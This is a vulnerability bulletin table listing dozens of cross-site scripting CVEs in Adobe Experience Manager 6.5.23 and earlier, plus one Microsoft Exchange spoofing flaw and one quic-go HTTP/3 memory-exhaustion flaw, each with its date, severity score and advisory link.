| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64546 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64547 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64548 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64549 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64550 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64551 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64553 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64554 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64555 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64556 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64557 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64558 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64559 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64560 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64562 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64563 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64564 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64565 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64566 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64569 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64572 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64574 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64575 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64576 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64577 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64578 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64579 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64580 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64581 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64582 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64583 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64585 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64586 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64590 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64591 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64592 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64593 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64594 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64596 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64597 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64598 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64599 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64600 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64601 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64602 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64603 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64604 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64605 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64606 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64607 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64609 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64611 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64612 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64613 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64614 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64615 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64616 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64619 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64620 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64622 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64623 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64626 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64627 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Microsoft--Microsoft Exchange Server Subscription Edition RTM | User interface (UI) misrepresentation of critical information in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network. | 2025-12-09 | 5.3 | CVE-2025-64667 | Microsoft Exchange Server Spoofing Vulnerability |
| quic-go--quic-go | quic-go is an implementation of the QUIC protocol in Go. Versions 0.56.0 and below are vulnerable to excessive memory allocation through quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an http.Header (used on the http.Request and http.Response, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion. This issue is fixed in version 0.57.0. | 2025-12-11 | 5.3 | CVE-2025-64702 | https://github.com/quic-go/quic-go/security/advisories/GHSA-g754-hx8w-x2g6 https://github.com/quic-go/quic-go/commit/5b2d2129f8315da41e01eff0a847ab38a34e83a8 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64789 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64790 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64791 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64792 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64793 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64794 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64796 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64797 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64799 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64800 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
